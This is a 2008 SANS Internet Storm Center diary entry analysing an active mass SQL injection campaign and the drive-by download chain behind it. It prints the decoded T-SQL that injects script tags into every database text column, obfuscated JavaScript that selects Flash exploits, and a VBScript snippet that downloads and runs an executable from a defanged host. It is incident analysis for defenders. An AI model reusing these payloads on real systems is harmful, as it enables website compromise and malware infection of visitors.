Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

More SQL Injections - very active right now

Published: 2008-08-08
Last Updated: 2008-08-08 16:40:52 UTC
by Mark Hofman (Version: 1)
5 comment(s)

Scott one of our readers wrote in to let us know that attempts were being made on his servers through an SQL injection.  He was the first and assisted with analysis, but he was not the last.  Since the first report we have received several in the last 4 hours or so.  There seems to be a lot of activity with this particular attack.

It looks like a repeat/variant on the attacks mentioned by Bojan here.

Overview:

                                                                                   |---i/f16.swf
                                                              |--- i1.html ---|---i/f28.swf
                              |--- Flash.htm -------|                    |---i/f64.swf
                              |                              |--- f2.html ---|---i/f115.swf
                              |--- 06014.htm                             |---i/f45.swf
                              |                                                   |---i/f47.swf
w.js --- new.htm ---|--- yahoo.htm--|
                              |                       |
                              |--- office.htm--| --rondll32.exe--msyahoo.exe--wsv.exe/thunder.exe
                              |                       |
                              |--- ksx.htm ----|

The Injection:
The string being injected is

“DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726
368617228323535292C40432076617263686172283430303029204445434C415245205461626
C655F437572736------------snip ------------2204445414C4C4F43436F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)" :”

Which breaks down into:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo. 
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo.  1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM  Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

Various types of sites seem to be hit at the moment.  From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.

Next:

A user visiting the site will hit w.js which, if they are using english, will pull down new.htm.  new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages,  flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm.   Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html

i1.html & f2.html

These file contains some java script:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";c=eval("String.fromCharCode("+c+")");document.write("<script>"+c+"<\/script>");
</script>S

This expands out to:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}; document.write("")

So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc).   Detection for these is poor.  The IE versions 9/36 at VT detect the file as malicious and for FF 10/36 detect the file as being malicious.

yahoo.htm

The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute.

pre>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script
</pre>

Office.htm

Attempts to create activeX objects and pulls the same rondll32.exe.  It looks like rondll32.exe pulls down thunder.exe and wsv.exe

ksx.htm

Attempts get the browser to include the rondll32.exe file

Detection for rondll32.exe is good with most AV products catching this one.

06014.htm

was unavailable at the time I checked.

 

These attacks are happening right now.  The people that reported them identified the attacks in their log files and IDS systems.  It is good to see that people are checking their logs.   Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site.  This round looks like it has just started.  We'll keep an eye on how this develops.

 

Cheers.

Mark - Shearwater

 

 




 

Keywords: sql injection
5 comment(s)
Diary Archives